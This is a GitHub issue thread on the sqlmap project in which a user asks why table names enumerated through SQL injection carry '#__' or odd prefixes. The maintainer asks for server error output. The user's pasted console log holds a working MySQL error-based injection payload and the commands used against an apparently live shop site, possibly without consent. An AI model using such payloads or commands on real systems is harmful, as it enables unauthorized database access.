### ISSUE TITLE
unable to retrieve tables names correctly 

### ISSUE THREAD

**Issue by qonsol-ctl** [sqlmapproject/sqlmap#4636]
**Describe the bug**
am dealing with an B,E,T technique i,m able to get the banner and the database names correctly but when dumping the table it dump with " #__tablename " i tired to use the T tech only it dumps with an weird data " f97te_tablename " 
exactly the same issue as #3989  

**To Reproduce**
1C:\sqlamp>sqlmap.py -r bl.txt --level=5 --risk=3 -D db --tables --technique=E --parse-errors
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.3.18#dev}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:49:50 /2021-04-09/

[19:49:50] [INFO] parsing HTTP request from 'bl.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]

[19:49:53] [INFO] resuming back-end DBMS 'mysql'
[19:49:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://vlu.com/p?id=262 AND (SELECT 2191 FROM(SELECT COUNT(*),CONCAT(0x716b6a7a71,(SELECT (ELT(2191=2191,1))),0x71626b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&product_qty=1&task=update&variant_id=3016&view=products
---
[19:49:54] [INFO] the back-end DBMS is MySQL
web application technology: LiteSpeed, PHP 7.3.11
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:49:54] [INFO] fetching tables for database: 'ddatabese '
[19:49:56] [INFO] retrieved: '#__epc_themes'
[19:49:56] [INFO] retrieved: '#__fields'
[19:49:57] [INFO] retrieved: '#__fields_categories'
[19:49:58] [INFO] retrieved: '#__fields_groups'
[19:49:58] [INFO] retrieved: '#__fields_values'
2. See error

**Expected behavior**
dump it correctly 
 **Screenshots**

**Running environment:**
 - sqlmap version [latest
 - -Installation method ZIP
 - Operating system: Microsoft Windows 10
 - Python version 3.7

**Target details:**
 - DBMS mysql
 - SQLi techniques found by sqlmap EBT
 - WAF/IPS NONE 
 - Relevant console output [if any]
 - Exception traceback [if any]

**Additional context**
i tried with parse error and verbose nothing interested ..

**Comment by stamparm** [comment]
Sorry, I don't understand what's going on here. You wrote " 2. See error", but I don't see any error here. Also, I don't understand what did you mean here `but when dumping the table it dump with " #__tablename " i tired to use the T tech only it dumps with an weird data " f97te_tablename "`

**Comment by qonsol-ctl** [comment]
when I'm dumping the tables while using ( E tech ) the tables names had a hash character in the name
![1](https://user-images.githubusercontent.com/72708964/114286529-42078f00-9a68-11eb-8e5c-dddbc26ea0fd.PNG)

when dumping the columns it says its empty ….
![1](https://user-images.githubusercontent.com/72708964/114286564-901c9280-9a68-11eb-8418-3a6ca9266705.PNG)

I tried a different tech (T&B) I got this as a result  
![2](https://user-images.githubusercontent.com/72708964/114286787-87c55700-9a6a-11eb-930f-33fc1558ce5e.PNG)


the tables name isn't correct …. I tried a various ways no help  
although the http traffic had some line I didn't get it 

(  {"errormsg":"Duplicate entry 'qkjzq#__TableNameqbkjq1' for key 'group_key'","error":1}   )

**Comment by stamparm** [comment]
1) Those table names do not look bad (with those hashes)
2) Please redo the `--columns -T '#__advancedmodules' --parse-errors` to find out the errors you get from the server

**Comment by qonsol-ctl** [comment]
same issue

**Comment by qonsol-ctl** [comment]
@stamparm

**Comment by stamparm** [comment]
I asked for more information (e.g. some errors from DBMS/server) and you replied with "same issue"
